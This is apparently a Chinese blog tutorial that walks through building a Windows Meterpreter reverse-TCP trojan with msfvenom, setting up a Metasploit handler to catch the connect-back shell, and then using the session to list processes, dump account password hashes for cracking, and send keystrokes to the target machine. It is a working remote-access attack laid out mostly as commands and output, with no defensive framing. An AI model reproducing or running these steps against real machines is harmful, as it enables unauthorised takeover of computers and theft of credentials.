msfvenom的shell在windows中的使用

msfvenom生成shell.exe

msfvenom -p windows/meterpreter/reverse_tcp lhost=123.123.123.123 lport=2222 -f exe >/root/shell.exe

输入命令:

msfconsole

metasploit侦听

msfvenom的shell在windows中的使用
msf > use exploit/multi/handler     #加载模块
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp    #设置payload
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 上面的ip   #设置kali的ip
lhost => 123.123.123.123
msf exploit(multi/handler) > set lport 上面的端口   #设置kali的端口
lport => 2222
msf exploit(multi/handler) > exploit   #执行
[*] Started reverse TCP handler on 123.123.123.123:2222 
msfvenom的shell在windows中的使用

将生成的shell上传至windows主机中并运行

提示有返回即可控制对方电脑,如同操作linux服务器一样

msfvenom的shell在windows中的使用

 kill 后面跟shell端的进程id,如果加-s会结束该会话的进程

 ifconfig和ipconfig 看ip

sysinfo 看系统信息

msfvenom的shell在windows中的使用

 

 ps 看进程(能看到shell.exe进程)

msfvenom的shell在windows中的使用

 

 hashdump 可以dump出账号口令的hash字段,拿去cmd5解,这里是为空

msfvenom的shell在windows中的使用

 keyboard_send ****  发送字符串到目标机

 msfvenom的shell在windows中的使用

 

 

 

参考:

metasploit、msfvenom生成木马入侵电脑及手机 - 秋夜雨巷 - 博客园 

相关文章:

  • 2021-12-04
  • 2022-02-09
  • 2022-02-06
  • 2022-12-23
  • 2021-05-13
  • 2021-04-18
  • 2021-11-11
  • 2021-10-18
猜你喜欢
  • 2021-07-26
  • 2021-08-02
  • 2022-12-23
  • 2021-08-23
  • 2021-09-13
  • 2021-09-07
  • 2021-06-29
相关资源
相似解决方案